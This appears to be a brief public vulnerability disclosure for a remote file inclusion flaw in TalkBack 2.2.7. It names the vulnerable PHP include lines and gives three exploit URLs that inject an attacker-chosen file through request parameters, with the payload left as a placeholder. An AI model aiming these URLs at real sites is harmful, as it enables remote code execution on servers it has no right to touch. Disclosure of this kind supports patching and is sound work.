TalkBack 2.2.7 - RFI


[o] TalkBack 2.2.7 Remote File Include Vulnerability
Software : TalkBack version 2.2.7
Vendor : http://www.scripts.oldguy.us/talkback
Author : NoGe


[o] Vulnerable file
comments-display-tpl.php
include $language_file;
include $config['comments_form_tpl'];
addons/separate-comments-mod/my-comments-display-tpl.php
include $language_file;


[o] Exploit
http://localhost/path/comments-display-tpl.php?language_file=[evilcode]
http://localhost/path/comments-display-tpl.php?config[comments_form_tpl]=[evilcode]
http://localhost/path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=[evilcode]


[o] Publish
http://milw0rm.com/exploits/4640


One Response so far.

  1. The preparing to do some research about that.